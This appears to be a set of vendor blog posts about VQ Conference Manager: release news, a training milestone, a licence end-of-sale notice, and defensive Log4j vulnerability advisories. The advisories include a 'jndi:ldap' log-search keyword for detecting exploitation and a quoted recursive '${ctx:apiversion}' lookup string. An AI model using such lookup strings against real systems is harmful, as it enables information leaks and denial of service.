VQ Conference Manager 3.9 released mid-January and takes us forward in a number of key areas:

1. One-Button-To-Push (“OBTP”). OBTP is something customers love and it’s been on our “to-do” list for a long time. OBTP follows on from Recurring Meetings and the public API; we now offer 3 of the key TMS features that will enable customers to migrate away from TMS.
2. Pane Placement/Layout management. Key for concierge services, Pane Placement allows the positioning of participants in specific video panes.
3. We’ve completely restructured the reporting dashboards with a very contemporary looking, clean, update. We’re particularly pleased with how visual they are; a lot of information is conveyed quickly and easily. Customer feedback from during the development process was incredibly positive. Not only do they look great, they’re also blistering quick. A lot of backwards and forwards took place between our engineering team and the engineers at Elastic. The results are stunning.

Watch our VQCM 3.9 Release Webinar here

VQ Conference Manager 3.9 is exciting because it adds some great new features. In my mind, however, it’s even more exciting because it’s the next step in a sequence that concludes with a full set of TMS replacement functionality. At VQCM 3.10 (April, 2022 time-frame), we add TMS style Directory Services and at VQCM 3.11, we’ll add device management (device configuration templates). 

The excitement is therefore that things are slowly but surely dropping into place and customers will have a secure, scalable, solution that enables them to deliver video conferencing services with end-to-end control. All based on best of breed, modern, software technology and components.

If that wasn’t brilliant enough, a lot of hard work in 2021 means the following are now just below the surface:

• A JITC compliant version of VQCM based on Red Hat Enterprise Linux (RHEL) 8.5. This is due to go into US DOD cyber scan testing in Q1 2022. The first version will be single node but HA will follow on.
• A multi-language capable end-user centric user interface.
• Something called “Call Gate” and “Identity Assured Participants”. We’re about to demo the concept for the first time. If you think it sounds interesting, let us know and we can do private demos. If you’d like to take a guess of what it is, we’ll give* VQ Sweatshirts for the most accurate or interesting answers.

That just leaves this small thing called the Cloud. As 2022 unfolds, we plan to “unleash the beast” and rather than run VQCM under Kubernetes in a VM on VMWare, we’ll take VQ and run it under Kubernetes natively on a cloud service such as AWS. We ran the concept last year and it was surprisingly painless. Our focus then switched to the RHEL version of VQCM. The plan is to repeat the process and take the RHEL version of VQCM, run the playbooks and have it alive and kicking under AWS. ”Look, no-hands” or more importantly, no VMWare. Anybody interested in running a secure version of VQCM on, for example, a secure Cloud? Answers on a postcard please.

Looking forward to a great 2022

Mike

* Limited Supply. Allocated in an entirely arbitrary manner.

I’m incredibly pleased with what we’ve achieved in 2021.

The product goes from strength to strength; big things this year include recurring meetings, active speaker and coming in January, pane placement, one-button-to-push (“OBTP”) and next generation Kibana dashboards. Each of them is a big engineering effort and fantastic to have finally delivered; it’s felt like they’ve been on the roadmap for a long time. Our investment on the platform is really paying off; the velocity at which we can include new functionality has increased and a lot of it is down to architectural changes and new API laid down over the last couple of years.

Active speaker

Pane placement

One-button-to-push (“OBTP”)

Next generation Kibana dashboards

An area I’m really pleased with is our product development process. We’ve invested heavily in it over the last 18 months and the results are really impressive. I can’t say it was easy and in the early stages we had some really difficult meetings; the good news is we worked through the challenges and the combination of platform architectural work and new process is yielding tremendous results. I should also say that we have a general principal of being “light on process”; process is good but too much process can become a real burden and massively detrimental.

The addition of Recurring Meetings scheduling is allowing customers to migrate their scheduling off TMS. Customers are starting to adopt the API; we’re seeing the first signs on life in terms of integrations (scheduling and work-flow-automation).

Our Cisco and partner relationships are working really well. The progress we’ve made clearing the roadmap backlog of “big things” means we’re able to spend more time working with the Cisco teams and aligning VQ with CMS. It feels like that is working really well and we’re excited about some of the things it’ll enable.

Underpinning everything is great people. We have a phenomenal team at VQ; we added some great new people at the back end of last year and I’m really pleased to say we have more joining us in January. The ‘team’ is broader than VQ; we work closely with Cisco, our partners and customers. It never ceases to amaze me at how fortunate we are to be able work with such a collection of “can do”/”make it happen” people and organizations. The collective results are amazing.

Behind the scenes, we’ve been working on US Defence Department approval. That’s a long, tough, process but at about 15 months into it, we’re heading towards completion. If you hear a loud “whoop”, you’ll know we finally did it.

That leads us to next year; we’ve got some great stuff coming your way. Our TMS replacement (Directory Services and Device Management & Automation) offering will start to appear early Q2. Key enablers are going in now that will see our scalability grow substantially as we progress thru 2022 which, in turn, allow a “whole pile of goodness” at the user interface level and user self-service functionality. We’re jazzed.

With that, I’d like to thank you again for working with VQ. Have a great Christmas/Holiday and New Year and we look forward to working with you in 2022.

Regards

Mike

Following the recent critical CVE issue with Log4j (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228) a second, lower severity CVE was made public December 14, 2021 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046). This second CVE is not mitigated by the previously provided mitigation script, however it is important to note that this is a separate issue to the one initially disclosed and has a much lower severity rating at the current moment.

Current advice from Elasticsearch (ES) regarding this new CVE and the mitigation previously provided indicates that it will still protect users against information leaks:

“Update 15 December: A further vulnerability (CVE-2021-45046) was disclosed on December 14th after it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. Our guidance for Elasticsearch and Logstash are unchanged by this new vulnerability and we are currently working to assess other products in order to provide a clear statement.”

It is also worth noting that:

Details on Elasticsearch information leakage

The information leakage vulnerability in Log4j enables an attacker to exfiltrate certain environmental data via DNS – it does not permit access to data within the Elasticsearch cluster. The data that can be leaked is limited to those available via Log4j “lookups”, which includes system environment variables and a limited set of environmental data from other sources.

(https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476)

The threat from the Denial of Service (DoS) that this new CVE presents can’t yet be fully dismissed. However early reports of testing this attack vector have indicated that it has a lower impact and is considered a limited DoS:

“However, in our testing we did not find this DOS to be resource consuming as it seemed that the infinite loop created by recursively resolving ${ctx:apiversion} was identified by the program and errored out.” – https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/

Here at VQ Communications we are actively monitoring the situation and incoming CVEs. As many security analysts are predicting that this situation is far from finished developing we continue to advise caution in exposing of your VQCM virtual machines and APIs to the public internet. There is every chance that more details regarding these CVEs and as yet undisclosed issues will surface in the coming days or weeks. We advise a defensive posture until such point as customers can upgrade to the 3.9 release of VQCM (due January 17, 2022).

The following posts provided additional background information:

https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/

https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

Summary:

1. The guidance from Elastic remains that the mitigation outlined in our mail yesterday still holds for the information leak. Apply the mitigation script if you haven’t already. When VQCM 3.9 becomes available in January (target Jan 17, 2022), update to VQCM 3.9.

2. Minimize public internet exposure wherever possible. If you do need to expose a public service, ensure only HTTPS ports are open and use a reverse proxy or equivalent.

We have added a link on the home page of vqcomms.com; it links to the latest status and all of our posts related to this CVE. 

The Mitigation Script and guidance to using it can be found here:

• Navigate to the https://www.vqcomms.com/resources/ page, log in and download the “log4j2-cve.zip” file from the “CVE-2021-44228 Mitigation Script” category. A User Guide can also be downloaded.

regards

The VQ Team

Yesterday morning, December 13, 2021, we issued a security advisory regarding a critical severity CVE that impacted an Apache library (Log4j 2) and anything which used this. This includes Elasticsearch (ES). Elasticsearch is a component within VQ Conference Manager.

We got to work in-house testing to better understand the issue, its implications and the impact it has on VQCM VMs. One of the conclusions from this analysis and testing was that it would be non-trivial for the CVE to be successfully exploited because of VQCM’s logging architecture. Especially for an external facing attacker.

Whilst this gives a degree of assurance, we strongly recommend customers apply a mitigation script we have created. The script follows mitigation advice from Elasticsearch. Details of how to get the script and how to run it can be found below.

In addition, Elasticsearch will be producing a new version of Elasticsearch (7.16.1) which removes the affected module. VQCM 3.9 is due mid-January and will contain Elasticsearch 7.16.1.

Our guidance is:

• Download and apply the mitigation script as soon as possible.
• Plan on upgrading to VQCM 3.9 in January (due 1/17/2022)
• Minimize public internet exposure wherever possible. If you do need to expose a public service, ensure only HTTPS ports are open and use a reverse proxy or equivalent.

Downloading and installing the mitigation script

Please note this script will bring the system down, so it is recommended to be run out of working hours. 

• Navigate to the https://www.vqcomms.com/resources/ page, log in and download the “log4j2-cve.zip” file from the “CVE-2021-44228 Mitigation Script” category.
• Enable SSH from the CM-Admin page (port 1234) under the “Start / Manage / SSH Access” section, and create an SSH user if you don’t already have one (Note: SSH is enabled if the button shows “Disable SSH access”).
• Using WinSCP or SCP, copy the “log4j2-cve.zip” file on the VQCM Virtual Machine (VM), under the home directory of your SSH user.
• Open an SSH session using Putty (or similar tool) with the VQCM VM, authenticating with the same SSH user.
• Run the following commands:
  • unzip log4j2-cve.zip
  • chmod +x log4j2-cve.sh
  • sudo ./log4j2-cve.sh

• This command will ask you for your password to escalate privileges, this is the same password as the SSH user you are logged in as.
• The tool will run for a moment (10-15 mins, could be more depending on how much data your system has). If it runs successfully to the end, it will output “SUCCESS the mitigation has been applied“:

PLAY RECAP **********************************************************************************************************************************************************************************************************************************************************************************************************************

localhost                  : ok=13   changed=7    unreachable=0    failed=0    skipped=8    rescued=0    ignored=0

All pods are running, exiting

usename

———-

postgres

(1 row)

ALTER ROLE

~~~

SUCCESS the migitation has been applied

~~~

If you see the SUCCESS message, the mitigation has been applied successfully. If you see the “ERROR the mitigation was NOT applied“, please contact VQ support at support@vqcomms.com, with as much information as possible.

Which versions of VQ can I use the mitigation script with? 

Versions 3.6, 3.7 and 3.8; please run the mitigation script.

For 3.x versions 3.5 and below, please contact support@vqcomms.com.

Regards

The VQ team

Over the weekend a critical security issue which impacts Log4j2 (CVE-2021-44228) and all products which use it as a dependency became public. This is a significant and critical level CVE and needs to be treated as such by any company which is even potentially impacted. As the VQCM virtual machine uses Elasticsearch (ES) for logging this issue impacts our products (Kibana is currently listed as not impacted). Due to the nature of the vulnerability and the extensive logging that VQCM provides any publicly exposed component of the VQCM becomes a potential attack surface. This includes the VQCM API / UI, as even a failed login can be used as a crafted log message to carry out an attack against the underlying ES logging.

By default, our product firewall settings block access to the ES port and we recommend that this port is blocked if you have previously opened it. If you have made your VQCM API / UI publicly accessible we recommend removing this public access by placing it behind your own firewall(s) or stopping the exposed service / route.

It is important to note that, as per current Elasticsearch security announcements, ES is not at risk of a Remote Code Execution attack, however it is still at risk of information leak.

As such we strongly advise all customers to immediately block publicly exposed elements of the VQCM instance. We are currently working on a mitigation (seen here – https://www.elastic.co/guide/en/elasticsearch/reference/7.16/advanced-configuration.html#set-jvm-options) for this issue following security announcements from Elasticsearch themselves which we are hoping to get out to customers as soon as we have finished in house security testing. The up-and-coming release of 3.9 (expected release date 17/01/2022) will include a fixed version of the Elasticsearch instance. 

Customers who are concerned and want to make sure their instance has not been impacted should check their web traffic logs (nginx) for the following keyword(s) “jndi:ldap”. If customers are unsure on how to do this, please carry out a log dump and make it available to us via our support team. Customers finding positive hits for this will need to assume that there has been an information leak from their VQCM instance and should take appropriate action.

Our support team is on hand for customers who wish to discuss this and would like additional information or help. 

Regards,

Mike Horsley 

Here we are about to press the ‘go’ button again on a new VQ Conference Manager release.

VQ Conference Manager 3.8 is very personal for me. We finally got to the point where we addressed some of my personal pet peeves. I’m delighted to say I’m really pleased with how it looks.

Let’s start with what customers are asking for: a solution that enables them to deliver conferencing services on CMS (call quality/experience, interoperability, scale and media security) that gives a user experience similar to the cloud based offerings. TMS customers are looking for a TMS replacement that addresses their OBTP, Directory Services and Device Management needs.

Then let’s throw in my pet peeves:

1.      It was difficult to find a soft client that worked consistently and well. There was also the challenge that we wanted to use one that we knew all our customers could use. We really needed a great soft client that shipped with every CMS that didn’t rely on a cloud based service.

2.      It was too difficult to share join details with the people I wanted to have calls with. It was embarrassing how many times I had people ask me to send them the details for their space/meeting so the people they wanted to meet could join their call.

VQ Conference Manager 3.8.0 and CMS 3.3 come together really nicely. Add Expressway with MRA and Web App works incredibly well; it gives us a client that ships with every CMS and VQCM’s new “Home” coApp makes it really easy to get the join details for a Space or Meeting. From the VQ UI, you can click Join for click to call ‘ease of join’. Sharing the details is a breeze; preview them or simply copy them and paste them into a mail, slack or meeting appointment.

What I really like is that in about 4 clicks, I can get the details for a Role on a Space (or meeting), copy and paste it into an email, send it out to people and then have them join from wherever they are – room system, soft client or out on the road, from their iPhone. It’s especially satisfying joining a call either via the Web App or Webex client from my phone – I still have that sense of disbelief how good the video is and I can do it from wherever I have Wi-Fi or 4G.

The results are sensational. I’m completely sold and have been loving the experience.

Activity got a pretty major rework and looks really good for it. Active Speaker now works across all call types. Recurring Meetings got some love and now support irregular patterns and a selectable end date (how did we miss that the first time around)?

Other ‘make my life easier’ functionality includes the addition of Local Users for those of us without AD/LDAP.

On the theme of ‘make my life easier’ – system installers will love the certificate management changes now in CM-Admin. Trusted certs, cert chain editor along with issuer labels and the ability to paste certs. Ansible playbooks start to appear with CMS backup playbooks and one for CMS certificate renewal.

VQ Conference Manager 3.8.0 paves the way for two follow-on releases:

·         VQCM 3.8.1 adds Pane Placement and more filtering of Meeting Lists (e.g., relative dates)

·         VQCM 3.8+ adds One Button To Push. 

VQCM 3.8.1 is currently planned for the January 2022 time frame; VQCM 3.8+ will be made available as an update to VQCM 3.8.0. No dates yet for 3.8+; we’re hoping sooner rather than later.

For all the details, please read the release notes available from the vqcomms.com (Menu->VQ conference Manager->release notes).

We’re really pleased with how it looks and we hope you like it too.

Keep up to date with the latest VQ news, join our ‘Ask VQ’ Webex Space

Here at VQ we’ve just passed another milestone as our 200^th person has completed our VQ Conference Manager certified training programmes.

Developed and delivered by our training partner, Scott Waschler, of TEKnowLogical Solutions, 2 hands-on training programmes are offered:

VQ Conference Manager Concierge and Call Management Certification (2 days)

For unified communications and help-desk engineers who are responsible for providing scheduling and trouble resolution to organizations using VQ Conference Manager, concentrating on after-deployment operations management.

VQ Conference Manager Deployment and System Administration Certification (3 days)

For unified communications and network engineers who are responsible for installing, configuring, and trouble resolution of VQ Conference Manager, concentrating on deployment and initial configuration of VQ Conference Manager.

Both can be ordered through Cisco’s GPL via CCW:

But why would you take time out of a busy schedule to take the courses? Here’s what a few recent attendees have said:

“Scott is an excellent instructor and always pauses at the right places to see if there are any questions and then move on. Course was paced properly and was all around enjoyable.”

“The training was excellent. Real kudos to the instructor, Scott, for breaking down a lot of detailed info for us.”

“Scott, our instructor, really knows his stuff…and did an excellent job of breaking it down into understandable chunks (a skill not every instructor has).”

So, if you’re interested in VQ Conference Manager, find out more at https://www.vqcomms.com/training/, speak to us on our ‘Ask VQ’ Webex Space or email us at info@vqcomms.com

Join Ask VQ Webex Space

VQCM 3.7 is now available to download and we think you’ll like it.

Here’s what’s new…

• Active Speaker indications for Scheduled Meetings
• People in Lobby indicators
• Meeting List filters
• Duplication/Cloning of LDAP Configs, UX Profiles, Space Templates, Email Templates
• Automatic Gain Control on Space Template Roles
• System use Terms and Conditions pre-login message
• Refinements to Elasticsearch data collection for CMS syslogs and Expressway syslogs, call data records and metric data; early adopter program extended
• Public API early adopter program
• Ansible CMS provisioning automation early adopter program

The API, Ansible CMS Provisioning and expanded Elasticsearch data collection from CMS/Expressway features are examples of how VQ starts to evolve into becoming a platform for UC solutions; more is coming and we’re very pleased to be making the first steps.

For the details, please see the vqcomms.com customer portal under knowledge base/release notes.

For customers wary of updating to the latest 3.7 release, now’s a good time to consider updating to VQCM 3.6.1. It’s been in the field now for about 3 months and is performing extremely well.

If you would like to be part of one of our early adopter programs, please email support@vqcomms.com

Please contact support@vqcomms.com to arrange installs or upgrades.

End-of-Sale Perpetual License Model Announcement

Overview

VQ Communications Ltd announces the end-of-sale and end-of-life dates for the VQ Conference Manager perpetual license model. The last day to order the affected product(s) is 1 May 2021. Customers with active service contracts will continue to receive support from the VQ Support as shown in Table 1 which describes the end-of-life milestones, definitions, and dates for the affected product(s). Table 2 lists the product part numbers affected by this announcement.

For customers with active and paid VQ Conference Manager Perpetual License service and support contracts, support will continue under the terms and conditions of the customer’s existing service contract and may be extended. This announcement only effects new customers.

End-of-life milestones

Table 1.           End-of-life milestones and dates for the VQ Perpetual License model

Milestone	Definition	Date
End-of-Life Announcement Date	The date the document that announces the end-of-sale and end-of-life of a product is distributed to the general public.	1st May 2021
End-of-Sale Date: App SW	The last date to order the VQ Conference Manager perpetual license. The product is no longer for sale after this date.	July 31, 2021
Last Ship Date: Software Support	The last-possible ship date that can be requested. Actual ship date is dependent on lead time.	July 31, 2021
End of SW Maintenance Releases Date: App SW	The last date that VQ Engineering may release any final software maintenance releases or bug fixes. After this date, VQ Engineering will no longer develop, repair, maintain, or test the product software.	Not affected
End of New Service Attachment Date: App SW	For software that is not covered by a service-and-support contract, this is the last date to order a new service-and-support contract or add the software to an existing service-and-support contract.	July 31, 2021

Product part numbers

Table 2.           Product part numbers affected by this announcement

Part Number	Product Description	Replacement Product Part Number	Replacement Product Description
VQConfAdvPMP	VQ Conference Manager Perpetual License for Cisco PMP+	VQ-LIC-PMP	VQ Conference Manager license per Cisco PMP+
VQConfAdvSMP	VQ Conference Manager Perpetual License for Cisco SMP+	VQ-LIC-PMP	VQ Conference Manager license per Cisco SMP+
VQAdd-in	VQ Conference Manager Perpetual License for either Outlook Add-in	VQ-LIC-1SSA	Single App, either Outlook Add-in, Jabber Extension or iOS
VQiOS	VQ Conference Manager Perpetual License for iOS	VQ-LIC-1SSA	Single App, either Outlook Add-in, Jabber Extension or iOS
VQUAPBundle	VQ Conference Manager Perpetual License for all Apps	VQ-LIC-SSAP	Apps Pack per knowledge worker – Outlook Add-in, Plug in, iOS phone app
AdvAnalytics	VQ Conference Manager Perpetual License for Advanced Analytics	VQ-OPT-ES	Annual Elastic Subscription per Elastic Data node
VQConfAdvMaint-1yr	VQ Conference Manager Perpetual License Annual Support – 1 yr	Replaced by VQ Subscription license model
VQConfAdvMaint-2for3yr	VQ Conference Manager Perpetual License Annual Support – Special Offer – Pay for 2 years get 3	Replaced by VQ Subscription license model
VQConfAdvMaint-3yr	VQ Conference Manager Perpetual License Annual Support – 3 yr	Replaced by VQ Subscription license model
VQConfAdvMaint-5yr	VQ Conference Manager Perpetual License Annual Support – 5 yr	Replaced by VQ Subscription license model